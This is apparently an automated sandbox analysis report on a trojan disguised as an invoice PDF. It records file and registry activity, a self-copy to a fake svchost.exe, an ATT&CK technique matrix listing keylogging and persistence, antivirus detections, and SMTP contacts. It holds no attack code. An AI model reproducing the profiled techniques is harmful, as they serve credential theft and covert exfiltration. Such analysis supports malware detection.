Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_ctypes.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_socket.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\select.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\pywintypes38.dll VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_queue.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\unicodedata.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_hashlib.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_ssl.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_bz2.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_lzma.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\win32gui.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\win32event.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\win32api.pyd VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4y2igpme VolumeInformation
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_ctypes.pyd VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_socket.pyd VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\select.pyd VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\pywintypes38.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_queue.pyd VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\unicodedata.pyd VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_hashlib.pyd VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_ssl.pyd VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_bz2.pyd VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_lzma.pyd VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\win32gui.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\win32event.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\win32api.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_ctypes.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_socket.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\select.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\pywintypes38.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_queue.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\unicodedata.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_hashlib.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_ssl.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_bz2.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\_lzma.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\win32gui.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\win32event.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\win32api.pyd VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe, Code function: 1_2_0131836B cpuid
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe, Code function: 1_2_01317FF1 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exe, Code function: 1_2_0132B193 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
Source: C:\Users\user\AppData\Roaming\svchost.exe, Code function: 19_2_6DA76470 PyArg_ParseTuple,GetVersionExW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z,Py_BuildValue,GetVersionExW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z,Py_BuildValue,PyExc_ValueError,PyExc_ValueError,PyErr_Format
Source: C:\Users\user\AppData\Roaming\svchost.exe, Code function: 19_2_6DA739F0 PyArg_ParseTuple,GetUserNameW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Native API 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 11 | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1 |
| Default Accounts | Scheduled Task/Job | Application Shimming 1 | Application Shimming 1 | Obfuscated Files or Information 2 | LSASS Memory | Peripheral Device Discovery 1 | Remote Desktop Protocol | Input Capture 11 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Registry Run Keys / Startup Folder 1 | Process Injection 12 | Software Packing 1 | Security Account Manager | Account Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 1 | Timestomp 1 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 11 | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | System Information Discovery 36 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 111 | Cached Domain Credentials | Security Software Discovery 141 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Modify Registry 1 | DCSync | Virtualization/Sandbox Evasion 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 2 | Proc Filesystem | Process Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 12 | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |
| Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | Remote System Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop |

Behavior Graph

[Figure: behavior graph. Behavior Graph ID: 534002; Sample: Cab_Invoice_pdf.bin; Startdate: 04/12/2021; Architecture: WINDOWS; Score: 72]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

| Source | Detection | Scanner | Label |
|---|---|---|---|
| Cab_Invoice_pdf.exe | 63% | Virustotal | |
| Cab_Invoice_pdf.exe | 33% | Metadefender | |
| Cab_Invoice_pdf.exe | 59% | ReversingLabs | Win32.Trojan.Fsysna |
| Cab_Invoice_pdf.exe | 100% | Avira | TR/Fsysna.zceqw |

Dropped Files

| Source | Detection | Scanner |
|---|---|---|
| C:\Users\user\AppData\Local\Temp\_MEI24122\VCRUNTIME140.dll | 0% | Metadefender |
| C:\Users\user\AppData\Local\Temp\_MEI24122\VCRUNTIME140.dll | 0% | ReversingLabs |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_asyncio.pyd | 0% | Metadefender |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_asyncio.pyd | 0% | ReversingLabs |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_bz2.pyd | 0% | Metadefender |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_bz2.pyd | 0% | ReversingLabs |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_ctypes.pyd | 0% | Metadefender |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_ctypes.pyd | 0% | ReversingLabs |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_decimal.pyd | 0% | Metadefender |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_decimal.pyd | 0% | ReversingLabs |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_hashlib.pyd | 0% | Metadefender |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_hashlib.pyd | 0% | ReversingLabs |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_lzma.pyd | 0% | Metadefender |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_lzma.pyd | 0% | ReversingLabs |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_multiprocessing.pyd | 0% | Metadefender |
| C:\Users\user\AppData\Local\Temp\_MEI24122\_multiprocessing.pyd | 0% | ReversingLabs |

Unpacked PE Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 1.3.Cab_Invoice_pdf.exe.10695b0.14.unpack | 100% | Avira | TR/Patched.Ren.Gen |

Domains

No Antivirus matches

URLs

Domains and IPs

Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| smtp.gmail.com | 142.250.145.108 | true | false | | high |

URLs from Memory and Binaries

Contacted IPs

Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 142.250.145.109 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.145.108 | smtp.gmail.com | United States | 15169 | GOOGLEUS | false |

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
